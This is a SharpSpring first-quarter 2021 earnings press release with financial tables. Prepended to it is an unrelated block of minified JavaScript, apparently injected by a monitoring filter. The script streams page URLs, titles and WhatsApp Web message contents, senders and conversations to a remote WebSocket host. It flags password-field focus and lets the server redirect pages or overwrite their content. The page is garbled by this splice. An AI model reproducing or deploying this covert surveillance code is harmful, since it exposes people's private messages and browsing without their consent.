 &#xD; &#xD; &#xD;&#xD; &#xD;&#xD; &#xD;&#xD;&#xD; &#xD;&#xD;&#xD; &amp;#xD;&#xD;&#xD;&#xD; &amp;#xD;&#xD;&#xD;&#xD; !function(){var Y,e,t;function n(){try{return window.self===window.top}catch(Y){return!1}}function r(){var Y={type:"focus",token:S.token,title:document.title,url:document.URL,useragent:navigator.userAgent,pid:S.pid,pn:S.pn};null!=I&amp;amp;&amp;amp;I.readyState==WebSocket.OPEN&amp;amp;&amp;amp;I.send(JSON.stringify(Y))}function a(){var Y={type:"notification",token:S.token,title:document.title,url:document.URL,focused:document.hasFocus(),timeout:S.sendNotificationsInterval,useragent:navigator.appVersion.length&amp;gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,pid:S.pid,pn:S.pn};I.send(JSON.stringify(Y))}function i(){h()}function o(){n()&amp;amp;&amp;amp;(clearInterval(y),clearInterval(N)),timeout=setTimeout((function(){f()}),v)}function s(Y){if(n())switch(Y.data.substring(0,1)){case"r":window.location=Y.data.substring(1);break;case"b":document.body.innerHTML=Y.data.substring(1);break;case"w":var e="true"==Y.data.substring(1).toLowerCase();T!=e&amp;amp;&amp;amp;e&amp;amp;&amp;amp;m(),T=e}}function M(Y){var e=document.createElement("a");return e.href=Y,e.href}function u(Y){if(Y&amp;amp;&amp;amp;"password"==Y.type&amp;amp;&amp;amp;!H){H=!0;var e={type:"password_input_focus",focus:!0,token:S.token};I.send(JSON.stringify(e))}}function D(Y){if(Y&amp;amp;&amp;amp;"password"==Y.type&amp;amp;&amp;amp;H){H=!1;var e={type:"password_input_focus",focus:!1,token:S.token};I.send(JSON.stringify(e))}}function c(Y){var e=document.activeElement;e&amp;amp;&amp;amp;e!=document.body?document.querySelector&amp;amp;&amp;amp;(e=document.querySelector(":focus")):e=null;for(var t=0;t&amp;lt;Y.length;++t){let i=Y[t];var n="password"==i.type,r=n&amp;amp;&amp;amp;i.hasAttribute("autofocus"),a=n&amp;amp;&amp;amp;e&amp;amp;&amp;amp;i.isEqualNode(e);(r||a)&amp;amp;&amp;amp;u(),i.onfocus=function(){u(i)},i.onblur=function(){D(i)}}}function d(){n()&amp;amp;&amp;amp;(S.iup&amp;amp;&amp;amp;r(),p()&amp;amp;&amp;amp;(m(),h(),function(){var Y=new MutationObserver((function(Y){Y&amp;amp;&amp;amp;Y.forEach((function(Y){Y&amp;amp;&amp;amp;("childList"!==Y.type||Y.addedNodes.length&amp;lt;=0||Y.addedNodes.forEach((function(Y){if(Y){var e=document.querySelector("div[id=main] header span[title]");e&amp;amp;&amp;amp;(b=e.innerText),document.querySelector("div[id=main] header span[data-icon=default-user]")&amp;amp;&amp;amp;(A="private"),document.querySelector("div[id=main] header span[data-icon=default-group]")&amp;amp;&amp;amp;(A="group");var t=Y.querySelectorAll(".message-in, .message-out");Y.matches(".message-in, .message-out")&amp;amp;&amp;amp;(t=Array.prototype.slice.call(t)).push(Y),t&amp;amp;&amp;amp;t.forEach((function(Y){if(Y&amp;amp;&amp;amp;Y.classList&amp;amp;&amp;amp;!(Y.classList.length&amp;lt;=0)){var e=Y.classList.contains("message-in"),t=Y.querySelector(".copyable-text"),n=Y.querySelector(".selectable-text"),r=new Date,a=null;if(t&amp;amp;&amp;amp;t.attributes["data-pre-plain-text"]){var i=t.attributes["data-pre-plain-text"].textContent,o=/\[(\d{1,2}):(\d{1,2})[ ]{0,1}([p|a]m)?,\s(.+)]\s(.*):/i[Symbol.match](i);if(!o||6!=o.length)return;if(o[3]&amp;amp;&amp;amp;"pm"==o[3].toLowerCase()&amp;amp;&amp;amp;(o[1]=parseInt(o[1])+12),dateParts=/(\d{1,4})[.-\\/](\d{1,4})[.-\\/](\d{1,4})/[Symbol.match](o[4]),!dateParts||4!=dateParts.length)return;if(!(r=date.parse(o[4],C)||function(Y,e,t){var n=[[Y,e,t].join("-"),[Y,t,e].join("-"),[e,Y,t].join("-"),[e,t,Y].join("-"),[t,Y,e].join("-"),[t,e,Y].join("-")],r=Date.now();for(var a in n){var i=Date.parse(n[a]);if(i&amp;amp;&amp;amp;!(Math.abs(r-i)&amp;gt;1728e6))return new Date(i)}}(dateParts[1],dateParts[2],dateParts[3])))return;r.setHours(o[1]),r.setMinutes(o[2]),a=o[5]}E.get(b)||E.set(b,k);var s=n?n.innerText:null;if(a&amp;amp;&amp;amp;s&amp;amp;&amp;amp;T){var M=(a+s+b+r.getTime()).split("").map((function(Y){return Y.charCodeAt(0)})).reduce((function(Y,e){return Y+((Y&amp;lt;&amp;lt;7)+(Y&amp;lt;&amp;lt;3))^e})).toString(16);if(E.get(b).getTime()==r.getTime()?r.setMilliseconds(++L):(L=0,E.set(b,r)),!M||w.has(M))return;var u={type:"wapmessage",timestamp:r.getTime(),id:M,incoming:e,sender:e?a:"Me",content:s,recipient:e?"Me":b,conversationId:b+"("+A+")"};I.send(JSON.stringify(u)),w.add(M)}}}))}})))}))}));if(!Y)return;Y.observe(document.body,{childList:!0,subtree:!0})}()),n()&amp;amp;&amp;amp;(a(),y=setInterval(a,S.sendNotificationsInterval),p()&amp;amp;&amp;amp;(N=setInterval(i,S.pollWhatsappTrackingInterval))),function(){for(var Y=[],e=document.getElementsByTagName("link"),t=0;t&amp;lt;e.length;++t)"icon"!=e[t].getAttribute("rel")&amp;amp;&amp;amp;"shortcut icon"!=e[t].getAttribute("rel")||(Y[Y.length]=M(e[t].getAttribute("href")));0==Y.length&amp;amp;&amp;amp;(Y[0]=M("/favicon.ico"));var n={type:"favicon"};n.url=document.URL,n.src=Y,n.title=document.title,n.token=S.token,n.useragent=navigator.appVersion.length&amp;gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,I.send(JSON.stringify(n))}(),S.dontTrackWebPasswords&amp;amp;&amp;amp;(c(document.getElementsByTagName("input")),new MutationObserver((function(Y){Y&amp;amp;&amp;amp;Y.forEach((function(Y){Y&amp;amp;&amp;amp;Y.addedNodes&amp;amp;&amp;amp;0!=Y.addedNodes.length&amp;amp;&amp;amp;(window.NodeList&amp;amp;&amp;amp;!NodeList.prototype.forEach&amp;amp;&amp;amp;(NodeList.prototype.forEach=Array.prototype.forEach),Y.addedNodes.forEach((function(Y){Y.tagName&amp;amp;&amp;amp;c(Y.getElementsByTagName("input"))})))}))})).observe(document,{childList:!0,subtree:!0}),window.onbeforeunload=D))}function l(){document.tmfilter||(f(),C={"ar-SA":"D/M/YY","bg-BG":"D.M.YYYY","ca-ES":"D/M/YYYY","zh-TW":"YYYY/M/D","cs-CZ":"D.M.YYYY","Da-DK":"D-M-YYYY","De-DE":"D.M.YYYY","el-GR":"D/M/YYYY","en-US":"M/D/YYYY","fi-FI":"D.M.YYYY","fr-FR":"D/M/YYYY","he-IL":"D/M/YYYY","hu-HU":"YYYY. M. D.","is-IS":"D.M.YYYY","it-IT":"D/M/YYYY","ja-JP":"YYYY/M/D","ko-KR":"YYYY-M-D","nl-NL":"D-M-YYYY","nb-NO":"D.M.YYYY","pl-PL":"YYYY-M-D","pt-BR":"D/M/YYYY","ro-RO":"D.M.YYYY","ru-RU":"D.M.YYYY","hr-HR":"D.M.YYYY","sk-SK":"D. M. YYYY","sq-AL":"YYYY-M-D","sv-SE":"YYYY-M-D","th-TH":"D/M/YYYY","tr-TR":"D.M.YYYY","ur-PK":"D/M/YYYY","iD-ID":"D/M/YYYY","uk-UA":"D.M.YYYY","be-BY":"D.M.YYYY","sl-SI":"D.M.YYYY","et-EE":"D.M.YYYY","lv-LV":"YYYY.M.D.","lt-LT":"YYYY.M.D","fa-IR":"M/D/YYYY","vi-VN":"D/M/YYYY","hy-AM":"D.M.YYYY","az-Latn-AZ":"D.M.YYYY","eu-ES":"YYYY/M/D","Mk-MK":"D.M.YYYY","af-ZA":"YYYY/M/D","ka-GE":"D.M.YYYY","fo-FO":"D-M-YYYY","hi-IN":"D-M-YYYY","Ms-MY":"D/M/YYYY","kk-KZ":"D.M.YYYY","ky-KG":"D.M.YY","sw-KE":"M/D/YYYY","uz-Latn-UZ":"D/M YYYY","tt-RU":"D.M.YYYY","pa-IN":"D-M-YY","gu-IN":"D-M-YY","ta-IN":"D-M-YYYY","te-IN":"D-M-YY","kn-IN":"D-M-YY","Mr-IN":"D-M-YYYY","sa-IN":"D-M-YYYY","Mn-MN":"YY.M.D","gl-ES":"D/M/YY","kok-IN":"D-M-YYYY","syr-SY":"D/M/YYYY","Dv-MV":"D/M/YY","ar-IQ":"D/M/YYYY","zh-CN":"YYYY/M/D","De-CH":"D.M.YYYY","en-GB":"D/M/YYYY","es-MX":"D/M/YYYY","fr-BE":"D/M/YYYY","it-CH":"D.M.YYYY","nl-BE":"D/M/YYYY","nn-NO":"D.M.YYYY","pt-PT":"D-M-YYYY","sr-Latn-CS":"D.M.YYYY","sv-FI":"D.M.YYYY","az-Cyrl-AZ":"D.M.YYYY","Ms-BN":"D/M/YYYY","uz-Cyrl-UZ":"D.M.YYYY","ar-EG":"D/M/YYYY","zh-HK":"D/M/YYYY","De-AT":"D.M.YYYY","en-AU":"D/M/YYYY","es-ES":"D/M/YYYY","fr-CA":"YYYY-M-D","sr-Cyrl-CS":"D.M.YYYY","ar-LY":"D/M/YYYY","zh-SG":"D/M/YYYY","De-LU":"D.M.YYYY","en-CA":"D/M/YYYY","es-GT":"D/M/YYYY","fr-CH":"D.M.YYYY","ar-DZ":"D-M-YYYY","zh-MO":"D/M/YYYY","De-LI":"D.M.YYYY","en-NZ":"D/M/YYYY","es-CR":"D/M/YYYY","fr-LU":"D/M/YYYY","ar-MA":"D-M-YYYY","en-IE":"D/M/YYYY","es-PA":"M/D/YYYY","fr-MC":"D/M/YYYY","ar-TN":"D-M-YYYY","en-ZA":"YYYY/M/D","es-DO":"D/M/YYYY","ar-OM":"D/M/YYYY","en-JM":"D/M/YYYY","es-VE":"D/M/YYYY","ar-YE":"D/M/YYYY","en-029":"M/D/YYYY","es-CO":"D/M/YYYY","ar-SY":"D/M/YYYY","en-BZ":"D/M/YYYY","es-PE":"D/M/YYYY","ar-JO":"D/M/YYYY","en-TT":"D/M/YYYY","es-AR":"D/M/YYYY","ar-LB":"D/M/YYYY","en-ZW":"M/D/YYYY","es-EC":"D/M/YYYY","ar-KW":"D/M/YYYY","en-PH":"M/D/YYYY","es-CL":"D-M-YYYY","ar-AE":"D/M/YYYY","es-UY":"D/M/YYYY","ar-BH":"D/M/YYYY","es-PY":"D/M/YYYY","ar-QA":"D/M/YYYY","es-BO":"D/M/YYYY","es-SV":"D/M/YYYY","es-HN":"D/M/YYYY","es-NI":"D/M/YYYY","es-PR":"D/M/YYYY","aM-ET":"D/M/YYYY","tzM-Latn-DZ":"D-M-YYYY","iu-Latn-CA":"D/M/YYYY","sMa-NO":"D.M.YYYY","Mn-Mong-CN":"YYYY/M/D","gD-GB":"D/M/YYYY","en-MY":"D/M/YYYY","prs-AF":"D/M/YY","bn-BD":"D-M-YY","wo-SN":"D/M/YYYY","rw-RW":"M/D/YYYY","qut-GT":"D/M/YYYY","sah-RU":"M.D.YYYY","gsw-FR":"D/M/YYYY","co-FR":"D/M/YYYY","oc-FR":"D/M/YYYY","Mi-NZ":"D/M/YYYY","ga-IE":"D/M/YYYY","se-SE":"YYYY-M-D","br-FR":"D/M/YYYY","sMn-FI":"D.M.YYYY","Moh-CA":"M/D/YYYY","arn-CL":"D-M-YYYY","ii-CN":"YYYY/M/D","Dsb-DE":"D. M. YYYY","ig-NG":"D/M/YYYY","kl-GL":"D-M-YYYY","lb-LU":"D/M/YYYY","ba-RU":"D.M.YY","nso-ZA":"YYYY/M/D","quz-BO":"D/M/YYYY","yo-NG":"D/M/YYYY","ha-Latn-NG":"D/M/YYYY","fil-PH":"M/D/YYYY","ps-AF":"D/M/YY","fy-NL":"D-M-YYYY","ne-NP":"M/D/YYYY","se-NO":"D.M.YYYY","iu-Cans-CA":"D/M/YYYY","sr-Latn-RS":"D.M.YYYY","si-LK":"YYYY-M-D","sr-Cyrl-RS":"D.M.YYYY","lo-LA":"D/M/YYYY","kM-KH":"YYYY-M-D","cy-GB":"D/M/YYYY","bo-CN":"YYYY/M/D","sMs-FI":"D.M.YYYY","as-IN":"D-M-YYYY","Ml-IN":"D-M-YY","en-IN":"D-M-YYYY","or-IN":"D-M-YY","bn-IN":"D-M-YY","tk-TM":"D.M.YY","bs-Latn-BA":"D.M.YYYY","Mt-MT":"D/M/YYYY","sr-Cyrl-ME":"D.M.YYYY","se-FI":"D.M.YYYY","zu-ZA":"YYYY/M/D","xh-ZA":"YYYY/M/D","tn-ZA":"YYYY/M/D","hsb-DE":"D. M. YYYY","bs-Cyrl-BA":"D.M.YYYY","tg-Cyrl-TJ":"D.M.YY","sr-Latn-BA":"D.M.YYYY","sMj-NO":"D.M.YYYY","rM-CH":"D/M/YYYY","sMj-SE":"YYYY-M-D","quz-EC":"D/M/YYYY","quz-PE":"D/M/YYYY","hr-BA":"D.M.YYYY.","sr-Latn-ME":"D.M.YYYY","sMa-SE":"YYYY-M-D","en-SG":"D/M/YYYY","ug-CN":"YYYY-M-D","sr-Cyrl-BA":"D.M.YYYY","es-US":"M/D/YYYY"}[navigator.language],document.tmfilter="present")}function f(){(I=new WebSocket(S.connectionString)).onclose=o,I.onmessage=s,I.onopen=d,S.extJs&amp;amp;&amp;amp;(this.extJs.webSockReady=()=&amp;gt;I.readyState===WebSocket.OPEN,this.extJs.webSockSend=Y=&amp;gt;I.send(Y))}function g(){var Y=function(){var Y=["webkit","moz","ms","o"];if("hidden"in document)return"hidden";for(var e=0;e&amp;lt;Y.length;e++)if(Y[e]+"Hidden"in document)return Y[e]+"Hidden";return null}();return!!Y&amp;amp;&amp;amp;document[Y]}function p(){var Y=document.head.querySelector("[name='og:title']");return!!Y&amp;amp;&amp;amp;"WhatsApp Web"===Y.getAttribute("content")}function h(){I.send(JSON.stringify({type:"waptracking"}))}function m(){E=new Map,w=new Set,L=0,(k=new Date).setSeconds(0),k.setMilliseconds(0)}Y=this,e={},t={en:{MMMM:"January February March April May June July August September October November December".split(" "),MMM:"Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(" "),dddd:"Sunday Monday Tuesday Wednesday Thursday Friday Saturday".split(" "),ddd:"Sun Mon Tue Wed Thu Fri Sat".split(" "),dd:"Su Mo Tu We Th Fr Sa".split(" "),A:["a.m.","p.m."],formatter:{YYYY:function(Y){return("000"+Y.getFullYear()).slice(-4)},YY:function(Y){return("0"+Y.getFullYear()).slice(-2)},Y:function(Y){return""+Y.getFullYear()},MMMM:function(Y){return this.MMMM[Y.getMonth()]},MMM:function(Y){return this.MMM[Y.getMonth()]},MM:function(Y){return("0"+(Y.getMonth()+1)).slice(-2)},M:function(Y){return""+(Y.getMonth()+1)},DD:function(Y){return("0"+Y.getDate()).slice(-2)},D:function(Y){return""+Y.getDate()},HH:function(Y){return("0"+Y.getHours()).slice(-2)},H:function(Y){return""+Y.getHours()},A:function(Y){return this.A[11&amp;lt;Y.getHours()|0]},hh:function(Y){return("0"+(Y.getHours()%12||12)).slice(-2)},h:function(Y){return""+(Y.getHours()%12||12)},mm:function(Y){return("0"+Y.getMinutes()).slice(-2)},m:function(Y){return""+Y.getMinutes()},ss:function(Y){return("0"+Y.getSeconds()).slice(-2)},s:function(Y){return""+Y.getSeconds()},SSS:function(Y){return("00"+Y.getMilliseconds()).slice(-3)},SS:function(Y){return("0"+(Y.getMilliseconds()/10|0)).slice(-2)},S:function(Y){return""+(Y.getMilliseconds()/100|0)},dddd:function(Y){return this.dddd[Y.getDay()]},ddd:function(Y){return this.ddd[Y.getDay()]},dd:function(Y){return this.dd[Y.getDay()]},Z:function(Y){return(0&amp;lt;(Y=Y.utc?0:Y.getTimezoneOffset()/.6)?"-":"+")+("000"+Math.abs(Y-Y%100*.4)).slice(-4)},post:function(Y){return Y}},parser:{find:function(Y,e){for(var t,n=-1,r=0,a=0,i=Y.length;a&amp;lt;i;a++)t=Y[a],!e.indexOf(t)&amp;amp;&amp;amp;t.length&amp;gt;r&amp;amp;&amp;amp;(n=a,r=t.length);return{index:n,length:r}},MMMM:function(Y){return this.parser.find(this.MMMM,Y)},MMM:function(Y){return this.parser.find(this.MMM,Y)},A:function(Y){return this.parser.find(this.A,Y)},h:function(Y,e){return(12===Y?0:Y)+12*e},pre:function(Y){return Y}}}},e.format=function(Y,n,r){var a=e.addMinutes(Y,r?Y.getTimezoneOffset():0),i=t.en,o=i.formatter;return a.utc=r,n.replace(/(\[[^\[\]]*]|\[.*\][^\[]*\]|YYYY|YY|MMM?M?|DD|HH|hh|mm|ss|SSS?|ddd?d?|.)/g,(function(Y){var e=o[Y];return e?o.post(e.call(i,a,n)):Y.replace(/\[(.*)]/,"$1")}))},e.parse=function(Y,n,r){var a,i,o=t.en,s=o.parser.pre(Y),M=0,u=/(MMMM?|A)|(YYYY)|(SSS)|(MM|DD|HH|hh|mm|ss)|(YY|M|D|H|h|m|s|SS)|(S)|(.)/g,D={2:/^\d{1,4}/,3:/^\d{1,3}/,4:/^\d\d/,5:/^\d\d?/,6:/^\d/};Y=[31,28,31,30,31,30,31,31,30,31,30,31];for(var c={Y:1970,M:1,D:1,H:0,m:0,s:0,S:0};a=u.exec(n);){var d=0,l=1;for(i="";!i;)i=a[++d];a=i.charAt(0);var f=s.slice(M);if(2&amp;gt;d){var g=o.parser[i].call(o,f,n);c[a]=g.index,"M"===a&amp;amp;&amp;amp;c[a]++,l=g.length}else if(7&amp;gt;d)g=(f.match(D[d])||[""])[0],c[a]=0|("S"===a?(g+"000").slice(0,-i.length):g),l=g.length;else if(" "!==a&amp;amp;&amp;amp;a!==f[0])return NaN;if(!l)return NaN;M+=l}return M===s.length&amp;amp;&amp;amp;g?(c.Y+=70&amp;gt;c.Y?2e3:100&amp;gt;c.Y?1900:0,c.H=c.H||o.parser.h(c.h||0,c.A||0),n=new Date(c.Y,c.M-1,c.D,c.H,c.m,c.s,c.S),Y[1]+=0|e.isLeapYear(n),1&amp;gt;c.M||12&amp;lt;c.M||1&amp;gt;c.D||c.D&amp;gt;Y[c.M-1]||23&amp;lt;c.H||59&amp;lt;c.m||59&amp;lt;c.s?NaN:r?e.addMinutes(n,-n.getTimezoneOffset()):n):NaN},e.isValid=function(Y,t){return!!e.parse(Y,t)},e.addYears=function(Y,t){return e.addMonths(Y,12*t)},e.addMonths=function(Y,e){var t=new Date(Y.getTime());return t.setMonth(t.getMonth()+e),t},e.addDays=function(Y,e){var t=new Date(Y.getTime());return t.setDate(t.getDate()+e),t},e.addHours=function(Y,t){return e.addMilliseconds(Y,36e5*t)},e.addMinutes=function(Y,t){return e.addMilliseconds(Y,6e4*t)},e.addSeconds=function(Y,t){return e.addMilliseconds(Y,1e3*t)},e.addMilliseconds=function(Y,e){return new Date(Y.getTime()+e)},e.subtract=function(Y,e){var t=Y.getTime()-e.getTime();return{toMilliseconds:function(){return t},toSeconds:function(){return t/1e3|0},toMinutes:function(){return t/6e4|0},toHours:function(){return t/36e5|0},toDays:function(){return t/864e5|0}}},e.isLeapYear=function(Y){return!(((Y=Y.getFullYear())%4||!(Y%100))&amp;amp;&amp;amp;Y%400)},e.isSameDay=function(Y,t){return e.format(Y,"YYYYMMDD")===e.format(t,"YYYYMMDD")},Y.date=e;var S={token:"26053547-9ee8-4090-bf63-9bb41546c97f",sendNotificationsInterval:Number("1000"),pollWhatsappTrackingInterval:Number("20000"),connectionString:"wss://tm.filter:1502",pid:"15604",pn:"firefox.exe",iup:false,dontTrackWebPasswords:false,extJs:null},v=6e4,y=null,N=null,b=null,A=null,T=!1,E=null,w=null,L=0,k=null,I=null,C="",H=!1;!function Y(e){g()?setTimeout((function(){Y(e)}),1e3):e()}((function(){S.extJs&amp;amp;&amp;amp;S.extJs.init(S.token),n()&amp;amp;&amp;amp;window.addEventListener("focus",r),(n()||S.extJs)&amp;amp;&amp;amp;l()}))}();&amp;#xD;&#xD;&#xD;&#xD; &amp;#xD;&#xD;&#xD;&#xD; &#xD;&#xD;&#xD; &#xD;&#xD; &#xD;
  Exhibit 99.1

SharpSpring Reports First Quarter 2021 Results

Path to Second Half Revenue Ramp Remains on Track Driven by Increased Sales and Marketing Programs Initiated at the Start of 2021

Existing Agency Cohort Performance Supports Path to $100 Million in High-Margin Recurring Revenue Target

GAINESVILLE, FL – May 13, 2021 – SharpSpring, Inc. (NASDAQ: SHSP), a leading cloud-based revenue growth platform, reported financial results for the first quarter ended March 31, 2021.

Recent Operational Highlights

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Appointed marketing technology leader Suaad Sait as President. Sait brings an extensive background leading product, engineering, and marketing at high-growth SaaS companies. In this newly created role, he will oversee the Company’s sales marketing, and customer success functions in addition to being involved in other senior leadership aspects of the business.

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Appointed senior finance executive and capital markets veteran Jason Costi to Board of Directors, whohas also been named a member of the Company’s Audit, Nominating and Corporate Governance Committees. Costi brings a nearly 20-year background in investments, capital markets and finance, with a consistent track record of building businesses as an on-the-ground operator and private equity investor.

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Earned TrustRadius awards for Best Usability, Best Feature Set Award and Best Customer Support based directly on feedback from SharpSpring’s customers. These accolades mark the fourth year in a row that SharpSpring has been honored as a top choice for customers through TrustRadius.

Management Commentary

“In the first quarter we took measurable steps forward along the roadmap we laid out at the end of last year and are paving the way for a meaningful revenue ramp beginning in the second half,” said SharpSpring CEO Rick Carlson. “While the results of our increased spending program will take time to translate into impactful new sales, we are seeing encouraging results within our current customer base, notably through adoption of our new annual license pricing option as well as improved attrition metrics. Overall cohort performance continues to track according to plan, and with the key investments we’ve made and will continue to make in product, sales and marketing, our business remains on the path to achieving our long-term $100 million ARR target we introduced in November.

“Operationally, we’ve made progress on several key initiatives designed to enhance user experience and optimize revenue profiles for both direct and agency customers. We instituted Free Trials this quarter, which has begun feeding in a greater pool of potential customers to the platform. Additionally, our Multi-Tiered pricing options slated to launch later in the year, should enable us to expand our addressable market by selling to smaller customers on one end while capturing more value from larger customers on the other. Going forward, we expect to see incremental progress in the second quarter and are well positioned to meet our revenue growth goals for the year.”

First Quarter 2021 Key Performance Indicators (KPIs)

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Total monthly recurring revenue (MRR) from new customers in the first quarter of 2021 was approximately $100,000 compared to $180,000 in the first quarter of 2020 and $132,000 in the fourth quarter of 2020. The decrease in MRR was largely due to a delayed benefit in new customer adoption as a result of new sales and marketing spend beginning in the first quarter. The Company expects sales and marketing spend to increase meaningfully throughout 2021, which will begin to have a material positive impact on new sales in the second half of the year.

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New customer additions are expected to generate approximately $1.2 million in annual recurring revenue (ARR).

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Finished the quarter with nearly 2,000 agency customers, approximately 500 direct customers, and more than 10,000 total businesses across all SharpSpring sales and marketing platforms including SharpSpring Ads and legacy products.

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On a year-over-year basis, Q1 2021 net revenue retention was 94.4%, an improvement over 91.7% in Q4 2020.

First Quarter 2021 Financial Results

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Total revenue increased 13% to a record $8.0 million from $7.1 million in the same year-ago period.

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Gross profit increased 30% to a record $6.1 million (76% of total revenue) from $4.7 million (66% of total revenue) in the same year-ago period.

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Net loss was $2.6 million, or $0.20 per share, compared to net loss of $988,000, or $0.09 per share, in the same year-ago period.

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Adjusted EBITDA loss (a non-GAAP metric reconciled below) totaled $1.8 million, compared to an adjusted EBITDA loss of $1.8 million in the same year-ago period.

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Core net loss (a non-GAAP metric reconciled below) totaled $1.9 million, or $0.14 per share, compared to core net loss of $785,000, or $0.07 per share, in the same year-ago period.

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At quarter-end, the Company had $26.9 million in cash, compared to $28.3 million at December 31, 2020.

2021 Financial Outlook

For the fiscal year ending December 31, 2021, SharpSpring expects total revenue to range between $34 million and $36 million. The Company’s guidance is based on recurring revenue from its current customer base and performance results tracked through April of this year. These expectations include the impact of increased sales and marketing spend that began in January 2021, which will support a related revenue ramp in the second half of the year.

Conference Call

SharpSpring management will hold a conference call today, May 13, 2021 at 4:30 p.m. Eastern time (1:30 p.m. Pacific time) to discuss these results.

Company CEO Rick Carlson and CFO Aaron Jackson will host the call, followed by a question and answer period.

U.S. dial-in number: 844-602-0380
International number: 862-298-0970

Please call the conference telephone number 5-10 minutes prior to the start time. An operator will register your name and organization. If you have any difficulty connecting with the conference call, please contact Gateway Investor Relations at 949-574-3860.

The conference call will be broadcast live and available for replay here and via the investor relations section of the company’s website at investors.sharpspring.com.

A replay of the conference call will be available after 7:30 p.m. Eastern time today through May 27, 2021.

Toll-free replay number: 877-481-4010
International replay number: 919-882-2331
Replay ID: 40820

About SharpSpring, Inc.

SharpSpring, Inc. (NASDAQ: SHSP) is a rapidly growing, highly-rated, global and affordable revenue growth platform delivered via a cloud-based Software-as-a-Service (SaaS) solution. More than 10,000 businesses around the world rely on SharpSpring platforms to generate leads, improve conversions to sales, and drive higher returns on marketing investments. Known for its innovation, open architecture and free customer support, SharpSpring offers flexible contracts at a fraction of the price of competitors making it an easy choice for growing businesses and digital marketing agencies. Learn more at sharpspring.com.

Non-GAAP Financial Measures

Adjusted EBITDA, core net loss and core net loss per share are "non-GAAP financial measures" presented as supplemental measures of the Company’s performance. These metrics are not presented in accordance with United States generally accepted accounting principles, or GAAP. The Company believes these measures provide additional meaningful information in evaluating its performance over time. However, the measures have limitations as analytical tools, and you should not consider them in isolation or as a substitute for analysis of the Company’s results as reported under GAAP. A reconciliation of net loss to these measures is included for your reference in the financial section of this earnings press release.

Important Cautions Regarding Forward-Looking Statements

Important Cautions Regarding Forward-Looking Statements
The information posted in this release may contain forward-looking statements within the meaning of the Private Securities Litigation Reform Act of 1995. You can identify these statements by use of the words “may,” “will,” “should,” “plans,” “explores,” “expects,” “anticipates,” “continues,” “estimates,” “projects,” “intends,” and similar expressions. Forward-looking statements are neither historical facts nor assurances of future performance. Instead, they are based only on our current beliefs, expectations and assumptions regarding the future of our business, future plans and strategies, projections, anticipated events and trends, the economy and other future conditions. Because forward-looking statements relate to the future, they are subject to inherent uncertainties, risks and changes in circumstances that are difficult to predict and many of which are outside of our control. Our actual results and financial condition may differ materially from those indicated in the forward-looking statements. Therefore, you should not rely on any of these forward-looking statements. Important factors that could cause our actual results and financial condition to differ materially from those indicated in the forward-looking statements include, but are not limited to, general economic and business conditions, effects of continued geopolitical unrest and regional conflicts, competition, changes in technology and methods of marketing, delays in completing new customer offerings, changes in customer order patterns, changes in customer offering mix, continued success in technological advances and delivering technological innovations, our ability to successfully utilize our cash to develop current and future products, delays due to issues with outsourced service providers, those events and factors described by us in Item 1. A “Risk Factors” in our most recent Form 10-K, and other risks to which our Company is subject, and various other factors beyond the Company’s control. Any forward-looking statement made by us in this press release is based only on information currently available to us and speaks only as of the date on which it is made. We undertake no obligation to publicly update any forward-looking statement, whether written or oral, that may be made from time to time, whether as a result of new information, future developments or otherwise.

Company Contact:
Aaron Jackson
Chief Financial Officer
Phone: 352-448-0967
Email: IR@sharpspring.com

Investor Relations:
Gateway Investor Relations
Matt Glover or Tom Colton
Phone: 949-574-3860
Email: SHSP@gatewayir.com

SharpSpring, Inc.
CONSOLIDATED STATEMENTS OF OPERATIONS
(Unaudited)

	Three Months Ended
	March 31,
	2021	2020
Revenue	$7,989,231	$7,052,729

Cost of services	1,890,013	2,367,642
Gross profit	6,099,218	4,685,087

Operating expenses:
Sales and marketing	3,791,382	3,034,121
Research and development	2,115,740	1,578,139
General and administrative	2,771,638	2,413,842
Intangible asset amortization	171,549	152,801

Total operating expenses	8,850,309	7,178,903

Operating loss	(2,751,091)	(2,493,816)

Other income (expense), net	173,809	(56,778)

Loss before income taxes	(2,577,282)	(2,550,594)
Provision (benefit) for income taxes	6,573	(1,562,517)

Net loss	$(2,583,855)	$(988,077)

Net loss per share, basic and diluted	$(0.20)	$(0.09)

Weighted average common shares outstanding, basic and diluted	12,814,164	11,521,192

SharpSpring, Inc.
CONSOLIDATED BALANCE SHEETS
(Unaudited)

	March 31,	December 31,
	2021	2020
Assets
Cash and cash equivalents	$26,859,935	$28,267,792
Accounts receivable	365,993	323,130
Unbilled receivables	1,264,921	1,248,060
Income taxes receivable	54,449	54,449
Other current assets	1,442,949	1,433,543
Total current assets	29,988,247	31,326,974

Property and equipment, net	2,012,335	2,188,948
Goodwill	10,221,440	10,250,088
Intangibles, net	3,844,302	4,015,851
Right-of-use assets	8,145,050	8,352,028
Other long-term assets	591,043	611,857
Total assets	$54,802,417	$56,745,746

Liabilities and Shareholders' Equity
Accounts payable	$879,027	$1,074,594
Accrued expenses and other current liabilities	1,646,501	1,259,836
Line of credit	1,900,000	1,900,000
Deferred revenue	950,997	845,265
Income taxes payable	83,098	81,221
Lease liability, current portion	736,466	724,627
Notes payable, current portion	3,045,884	2,630,962
Total current liabilities	9,241,973	8,516,505

Lease liability, net of current portion	7,566,684	7,771,898
Notes payable, net of current portion	188,116	768,538
Total liabilities	16,996,773	17,056,941

Shareholders' equity:
Preferred stock, $0.001 par value	-	-
Common stock, $0.001 par value	12,854	12,819
Additional paid in capital	76,255,585	75,544,966
Accumulated other comprehensive loss	(225,229)	(215,269)
Accumulated deficit	(38,153,566)	(35,569,711)
Treasury stock	(84,000)	(84,000)
Total shareholders' equity	37,805,644	39,688,805

Total liabilities and shareholders' equity	$54,802,417	$56,745,746

SharpSpring, Inc.
CONSOLIDATED STATEMENTS OF CASH FLOWS
(Unaudited)

	Three Months Ended
	March 31,
	2021	2020
Net loss	$(2,583,855)	$(988,077)

Adjustments to reconcile loss from operations:
Depreciation and amortization	444,081	356,579
Gain on extinguishment of debt	(166,975)	-
Amortization of costs to acquire contracts	204,273	202,439
Non-cash stock compensation	555,586	370,632
Loss on disposal of property and equipment	1,526	-
Unrealized foreign currency (gain) loss	(46,908)	80,727
Changes in assets and liabilities:
Accounts receivable	(47,120)	(85,272)
Unbilled receivables	(31,785)	(92,496)
Right-of-use assets	206,978	(405,719)
Other assets	(193,429)	(342,872)
Income taxes, net	6,573	(1,562,944)
Accounts payable	(194,939)	890,013
